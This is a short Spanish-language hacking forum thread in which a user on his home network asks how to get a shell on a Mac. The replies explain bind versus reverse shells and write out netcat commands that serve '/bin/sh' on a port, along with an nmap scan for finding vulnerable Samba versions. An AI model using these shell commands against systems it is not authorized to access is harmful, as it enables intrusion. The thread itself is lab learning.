Conseguir Shell

[frantheviking]

Hola,

tengo dos ordenadores conectados en mi red, uno con linunx, y otro con MAC OSX.

He buscado con nmap los puertos abiertos del MAC desde mi linux, he probado a conseguir shell con mi linux en el MAC, pero sin resultados positivos.

Este es el resultado de mi nmap sobre la victima:

Nmap scan report for 192.168.1.8
Host is up (0.0050s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE
88/tcp  open  kerberos-sec
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
515/tcp open  printer
548/tcp open  afp
631/tcp open  ipp

Que posibilidades tengo? He hecho nc -l -p 139 y en la victima nc -e /bin/sh 192.168.1.8 139, pero de nuevo nada de nada

Gracias

[RevangelyonX]

Hola

Posibilidades ninguna.

Estas confundiendo terminos básicos de bind shell reverse shell etc.

Lo que quieres es obtener una shell de pruebas sin explotar ningun servicio. Por lo tanto el escenario puede ser el siguiente:

Vic1 escuchando un puerto y -e /bin/sh (esto es bind)
o
Vic1 conectandose a un puerto y maquina remota y -e /bin/sh (esto es reverse shell)

El problema de tu caso es que primero confundes victima con atacante. Segundo que no puedes hacer un listen en un puerto que ya esta open.

Te sugiero lo siguiente:
victima
nc -nlp 4444 -e /bin/sh

atacante
nc ip.dd.victima 4444

esto Es una bind shell.

Le información sobre el uso de Netcat y sus posibiliades.
Salu2

[adastra]

 que version de samba esta corriendo en tu Mac?
ejecuta:
nmap -sSV -T5 -A ip


Algunas versiones de samba que corren sobre Mac son vulnerables, esa seria tu única alternativa de entrar en aquella máquina.